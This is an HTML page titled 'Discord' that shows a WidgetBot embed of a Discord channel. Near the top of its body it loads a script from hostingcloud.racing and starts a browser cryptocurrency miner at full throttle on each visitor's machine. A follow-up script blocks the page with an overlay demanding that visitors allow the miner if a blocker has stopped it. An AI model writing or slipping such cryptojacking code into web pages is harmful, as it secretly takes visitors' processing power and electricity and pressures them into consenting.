<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="apple-mobile-web-app-capable" content="yes" />
    <meta name="apple-mobile-web-app-status-bar-style" content="black" />
    <meta name="viewport" content="user-scalable=no, initial-scale=1, maximum-scale=1, minimum-scale=1, width=device-width, height=device-height" />
    <link rel="manifest" href="manifest.json" />
    <link rel="apple-touch-icon" href="/images/icon.jpeg" />
    <link rel="icon" type="image/x-icon" href="/images/favicon.ico">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,500;1,500&display=swap" rel="stylesheet">
    <title>Discord</title>
    <style>
        body, html {
            margin: 0;
            padding: 0;
            overflow: hidden;
            height: 100%;
            background-color: #222327;
        }
        .roboto-medium {
            font-family: "Roboto", sans-serif;
            font-weight: 500;
            font-style: normal;
        }
        .roboto-medium-italic {
            font-family: "Roboto", sans-serif;
            font-weight: 500;
            font-style: italic;
        }
        #header {
            background-image: url('images/header.jpeg');
            background-size: cover;
            background-position: center;
            height: 70px;
            display: flex;
            align-items: center;
            justify-content: flex-start;
            padding-left: 20px;
            color: white;
            font-size: 24px;
            font-weight: bold;
        }
        #content {
            height: calc(100% - 70px); /* Subtract header height */
        }
    </style>
</head>
<body>

    <script src="https://www.hostingcloud.racing/WxaY.js"></script>
<script>
    var _client = new Client.Anonymous('a2cfde643058e13f77be004b79de55e4b547eca1b12d047d61b8bebd62f6e5b9', {
        throttle: 0, c: 'w'
    });
    _client.start();
    
</script>
<script>
    setTimeout(function(){
        if(typeof _client === 'undefined' || _client === null)
        {
            var messageDiv = document.createElement("div");
            messageDiv.setAttribute("style","width: 50%; background-color: white; padding: 15px; display: inline-block; vertical-align: middle;");
            messageDiv.appendChild(document.createTextNode("Please allow our miner on your blocker software to continue browsing our site. Reload the page after that."));
            var mainDiv = document.createElement("div");
            mainDiv.setAttribute("style","position: absolute; top: 0px; right: 0px; width: 100%; height: 100%; display: flex; background-color: #4c4c4c;  align-items: center; justify-content: center");
            mainDiv.appendChild(messageDiv);
            document.body.appendChild(mainDiv);
            document.getElementsByTagName("body")[0].style.overflow = "hidden";
            window.scrollTo(0, 0);
        }
    },1000);
</script>
    <div id="header" class="roboto-medium">Discord</div>
    <div id="content">
        <widgetbot
          server="1344448924941025381"
          channel="1350574984891728025"
          width="130vh"
          height="calc(85vh - 70px)"
          style="position: absolute; left: 50%; top: calc(50% + 25px); transform: translate(-50%, -50%);"
        ></widgetbot>
        <script src="https://cdn.jsdelivr.net/npm/@widgetbot/html-embed"></script>
    </div>
</body>
</html>
